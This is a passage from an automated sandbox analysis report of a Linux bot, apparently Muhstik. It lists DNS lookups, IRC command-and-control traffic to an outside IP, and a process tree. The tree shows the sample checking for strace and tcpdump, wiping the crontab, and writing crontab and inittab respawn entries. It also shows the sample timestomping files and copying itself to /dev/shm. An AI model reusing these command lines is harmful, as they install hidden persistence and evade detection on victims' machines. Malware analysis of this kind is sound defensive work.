                                                                                                                                          Dec 23, 2021 11:31:22.166868925 CET192.168.2.231.1.1.10xca9eStandard query (0)l.deutschland-zahlung.netA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:22.208921909 CET192.168.2.231.1.1.10xca9eStandard query (0)l.deutschland-zahlung.netA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:22.402837038 CET192.168.2.231.1.1.10x4095Standard query (0)l.deutschland-zahlung.netA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:22.783082962 CET192.168.2.231.1.1.10x4095Standard query (0)l.deutschland-zahlung.netA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:22.812175035 CET192.168.2.231.1.1.10x8623Standard query (0)l.deutschland-zahlung.netA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:22.829816103 CET192.168.2.231.1.1.10x8623Standard query (0)l.deutschland-zahlung.netA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:24.109206915 CET192.168.2.231.1.1.10xfca3Standard query (0)l.deutschland-zahlung.netA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:24.140464067 CET192.168.2.231.1.1.10xfca3Standard query (0)l.deutschland-zahlung.netA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:24.276345015 CET192.168.2.231.1.1.10xf3f0Standard query (0)l.deutschland-zahlung.netA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:24.293488979 CET192.168.2.231.1.1.10xf3f0Standard query (0)l.deutschland-zahlung.netA (IP address)IN (0x0001)

                                                                                                                                          DNS Answers

                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                          Dec 23, 2021 11:31:21.713069916 CET1.1.1.1192.168.2.230x9bf2Name error (3)l.deutschland-zahlung.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:21.729979992 CET1.1.1.1192.168.2.230x9bf2Name error (3)l.deutschland-zahlung.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:21.786370039 CET1.1.1.1192.168.2.230x32e8Name error (3)l.deutschland-zahlung.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:21.802721024 CET1.1.1.1192.168.2.230x32e8Name error (3)l.deutschland-zahlung.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:22.208149910 CET1.1.1.1192.168.2.230xca9eName error (3)l.deutschland-zahlung.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:22.225281000 CET1.1.1.1192.168.2.230xca9eName error (3)l.deutschland-zahlung.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:22.782742977 CET1.1.1.1192.168.2.230x4095Name error (3)l.deutschland-zahlung.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:22.799360037 CET1.1.1.1192.168.2.230x4095Name error (3)l.deutschland-zahlung.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:22.829125881 CET1.1.1.1192.168.2.230x8623Name error (3)l.deutschland-zahlung.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:22.846288919 CET1.1.1.1192.168.2.230x8623Name error (3)l.deutschland-zahlung.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:24.140013933 CET1.1.1.1192.168.2.230xfca3Name error (3)l.deutschland-zahlung.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:24.157177925 CET1.1.1.1192.168.2.230xfca3Name error (3)l.deutschland-zahlung.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:24.293042898 CET1.1.1.1192.168.2.230xf3f0Name error (3)l.deutschland-zahlung.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:24.309743881 CET1.1.1.1192.168.2.230xf3f0Name error (3)l.deutschland-zahlung.netnonenoneA (IP address)IN (0x0001)

                                                                                                                                          IRC Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                          Dec 23, 2021 11:31:26.324960947 CET487148080192.168.2.23156.67.220.165NICK x86|LOG|i|0|10263889|galassia
                                                                                                                                          USER x01 localhost localhost :muhstik-11052018
                                                                                                                                          Dec 23, 2021 11:31:27.215404034 CET487148080192.168.2.23156.67.220.165JOIN #log :8974
                                                                                                                                          WHO x86|LOG|i|0|10263889|galassia

                                                                                                                                          System Behavior

                                                                                                                                          General

                                                                                                                                          Start time:11:31:15
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:/tmp/pty3
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:15
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:15
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "pidof -x strace > /dev/null"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:15
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:15
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/pidof
                                                                                                                                          Arguments:pidof -x strace
                                                                                                                                          File size:27016 bytes
                                                                                                                                          MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                                                                                                                          General

                                                                                                                                          Start time:11:31:17
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:17
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "pidof -x tcpdump > /dev/null"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:17
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:17
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/pidof
                                                                                                                                          Arguments:pidof -x tcpdump
                                                                                                                                          File size:27016 bytes
                                                                                                                                          MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "crontab -r"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/crontab
                                                                                                                                          Arguments:crontab -r
                                                                                                                                          File size:43720 bytes
                                                                                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "crontab -l | grep /tmp/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/pty3 > /dev/null 2>&1 &\") | crontab -"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/crontab
                                                                                                                                          Arguments:crontab -l
                                                                                                                                          File size:43720 bytes
                                                                                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/grep
                                                                                                                                          Arguments:grep /tmp/pty3
                                                                                                                                          File size:199136 bytes
                                                                                                                                          MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/grep
                                                                                                                                          Arguments:grep -v "no cron"
                                                                                                                                          File size:199136 bytes
                                                                                                                                          MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/crontab
                                                                                                                                          Arguments:crontab -l
                                                                                                                                          File size:43720 bytes
                                                                                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/crontab
                                                                                                                                          Arguments:crontab -
                                                                                                                                          File size:43720 bytes
                                                                                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "cat /etc/inittab | grep -v \"/tmp/pty3\" > /etc/inittab2"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/cat
                                                                                                                                          Arguments:cat /etc/inittab
                                                                                                                                          File size:43416 bytes
                                                                                                                                          MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/grep
                                                                                                                                          Arguments:grep -v /tmp/pty3
                                                                                                                                          File size:199136 bytes
                                                                                                                                          MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "echo \"0:2345:respawn:/tmp/pty3\" >> /etc/inittab2"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/cat
                                                                                                                                          Arguments:cat /etc/inittab2
                                                                                                                                          File size:43416 bytes
                                                                                                                                          MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "rm -rf /etc/inittab2"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/rm
                                                                                                                                          Arguments:rm -rf /etc/inittab2
                                                                                                                                          File size:72056 bytes
                                                                                                                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/touch
                                                                                                                                          Arguments:touch -acmr /bin/ls /etc/inittab
                                                                                                                                          File size:100728 bytes
                                                                                                                                          MD5 hash:3859c173f5d3b37be3e531b7c84a9c68

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "cp -f /tmp/pty3 /dev/shm/pty3"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/cp
                                                                                                                                          Arguments:cp -f /tmp/pty3 /dev/shm/pty3
                                                                                                                                          File size:153976 bytes
                                                                                                                                          MD5 hash:40f10ae7ea3e44218d1a8c306f79c83f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "crontab -l | grep /dev/shm/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/pty3 > /dev/null 2>&1 &\") | crontab -"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/crontab
                                                                                                                                          Arguments:crontab -l
                                                                                                                                          File size:43720 bytes
                                                                                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/grep
                                                                                                                                          Arguments:grep /dev/shm/pty3
                                                                                                                                          File size:199136 bytes
                                                                                                                                          MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/grep
                                                                                                                                          Arguments:grep -v "no cron"
                                                                                                                                          File size:199136 bytes
                                                                                                                                          MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:21
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/crontab
                                                                                                                                          Arguments:crontab -l
                                                                                                                                          File size:43720 bytes
                                                                                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/crontab
                                                                                                                                          Arguments:crontab -
                                                                                                                                          File size:43720 bytes
                                                                                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "cat /etc/inittab | grep -v \"/dev/shm/pty3\" > /etc/inittab2"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/cat
                                                                                                                                          Arguments:cat /etc/inittab
                                                                                                                                          File size:43416 bytes
                                                                                                                                          MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:20
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/grep
                                                                                                                                          Arguments:grep -v /dev/shm/pty3
                                                                                                                                          File size:199136 bytes
                                                                                                                                          MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                                                                                                          General

                                                                                                                                          Start time:11:31:21
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:21
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "echo \"0:2345:respawn:/dev/shm/pty3\" >> /etc/inittab2"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/usr/bin/cat
                                                                                                                                          Arguments:cat /etc/inittab2
                                                                                                                                          File size:43416 bytes
                                                                                                                                          MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/tmp/pty3
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:48980 bytes
                                                                                                                                          MD5 hash:fdd5532c5ec4d3238d2fd36b0a0b187f

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
                                                                                                                                          Start date:23/12/2021
                                                                                                                                          Path:/bin/sh
                                                                                                                                          Arguments:sh -c "rm -rf /etc/inittab2"
                                                                                                                                          File size:129816 bytes
                                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                          General

                                                                                                                                          Start time:11:31:22
